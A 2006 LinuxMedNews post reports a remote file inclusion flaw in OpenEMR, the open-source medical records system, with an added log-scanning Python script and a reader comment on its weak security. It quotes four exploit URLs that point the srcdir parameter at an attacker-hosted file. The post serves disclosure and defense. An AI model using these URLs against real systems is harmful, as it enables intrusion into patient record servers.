Welcome to LinuxMedNews
  OpenEMR vulnerability disclosed
OpenEMR Posted by Fred Trotter on Tuesday November 07, 2006 @ 04:03 PM
from the OpenEMR dept.
An Indonesian hacker named Dedi Dwianto has just publicized a vulnerability in OpenEMR. This is a significant milestone for the project. This means that OpenEMR is popular enough for a security researcher to take notice. Open Source has the potential to be more secure, but only if security researchers look for flaws and then the projects respond by fixing the code. (I wish I had hackers studying my code...) I am sure that the OpenEMR folks will be releasing a patch soon. If you are an OpenEMR user, you should upgrade to the soon-to-be-released version ASAP. Read more for a description of the vulnerability...

Fred Trotter

Apparently, there are several places in OpenEMR where an unchecked GET parameter is passed in. OpenEMR expects a value on the local filesystem; however, a URL can be passed in instead, with unexpected results. From the exploit...

http://target.com/[OpenEMR-path]/interface/billing/billing_process.php?srcdir=http://atacker.com/inject.txt?

http://target.com/[OpenEMR-path]/interface/new/new_patient_save.php?srcdir=http://atacker.com/inject.txt?

http://target.com/[OpenEMR-path]/login.php?srcdir=http://atacker.com/inject.txt?

http://target.com/[OpenEMR-path]/library/translation.inc.php?GLOBALS[srcdir]=http://atacker.com/inject.txt?

The security researcher suggests turning off register_globals and checking for sanity in srcdir, but as I recall, OpenEMR does not use register_globals. We will have to wait for comment/patch from OpenEMR to see what the fix is.
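
For administrators, one way to check web server access logs for requests of the shape quoted above, where srcdir or GLOBALS[srcdir] carries a URL instead of a local path. This is an added example, not code from the advisory or from OpenEMR; the access log format, the "/openemr" prefix and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Parameter names exactly as they appear in the advisory URLs quoted above.
SUSPECT_PARAMS = {"srcdir", "GLOBALS[srcdir]"}
# "scheme:" prefix (http:, ftp:, ...); 2+ scheme chars so "C:\..." is not flagged.
REMOTE_VALUE = re.compile(r"^\s*[a-z][a-z0-9+.\-]+:", re.IGNORECASE)
# Request field of a common/combined-format access log line (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines: "/openemr", the addresses and the host are placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Nov/2006:16:10:01 +0000] "GET /openemr/login.php HTTP/1.1" 200 2311',
    '198.51.100.7 - - [07/Nov/2006:16:11:42 +0000] "GET /openemr/login.php'
    '?srcdir=http://example.invalid/inject.txt? HTTP/1.1" 200 512',
    '198.51.100.7 - - [07/Nov/2006:16:11:43 +0000] "GET /openemr/library/translation.inc.php'
    '?GLOBALS%5Bsrcdir%5D=HTTP%3A%2F%2Fexample.invalid%2Finject.txt%3F HTTP/1.1" 200 0',
    '192.0.2.10 - - [07/Nov/2006:16:12:05 +0000] "GET /openemr/interface/billing/'
    'billing_process.php?srcdir=../../library HTTP/1.1" 200 4096',
]


def srcdir_params(target):
    """Decode the query string once and keep only the srcdir-style parameters."""
    query = target.partition("?")[2]
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True) if k in SUSPECT_PARAMS]


def is_remote_value(value):
    """The sanity check: True when the value is a URL rather than a local path."""
    return bool(REMOTE_VALUE.match(value))


def find_srcdir_probes(log_lines):
    """Return (line number, parameter, decoded value) for each suspicious request."""
    hits = []
    for lineno, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        params = srcdir_params(match.group(1)) if match else []
        hits += [(lineno, n, v) for n, v in params if is_remote_value(v)]
    return hits


if __name__ == "__main__":
    for hit in find_srcdir_probes(SAMPLE_LOG):
        print("line %d: %s=%s" % hit)
```

The same is_remote_value predicate expresses the "checking for sanity in srcdir" suggestion: a value that parses as a URL is rejected before it is treated as a directory.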


  The Fine Print: The following comments are owned by whoever posted them.

    Re: OpenEMR vulnerability disclosed
    by Mark Leeds on Wednesday November 08, 2006 @ 02:12 AM
    I agree that this needs to be fixed. I will make the attempt myself and see what I can do to contribute to the solution. On the other hand, I believe that OpenEMR has many security holes. To secure all of them would likely mean rewriting the entire program from the ground up. For example: There are examples of strings inserted into the database from forms without any checking for malicious queries. There are areas which are hard to secure. A savvy user could enter a URL directly and access an area that is supposedly secured from general user access. You have to take into account where this 'program' is being used. It is essentially a website intended for internal use. It clearly should not be exposed to the web and should not be used by patients and other non-employees. Future EMR projects should include developers who are experts in internet security. The projects should be based on frameworks which make this sort of security easier to enforce, especially for projects whose ambition is to scale up to larger environments, such as hospitals, networked clinics, and other large healthcare systems. That being said, I use OpenEMR in my office and I love the ease with which I can modify it and tailor it to my practice. I do not expose it to the outside world and I only let trusted employees use it.
    All trademarks and copyrights on this page are owned by their respective companies. Comments are owned by the Poster. The Rest ©2000-2006 Ignacio Valdes, MD, MS.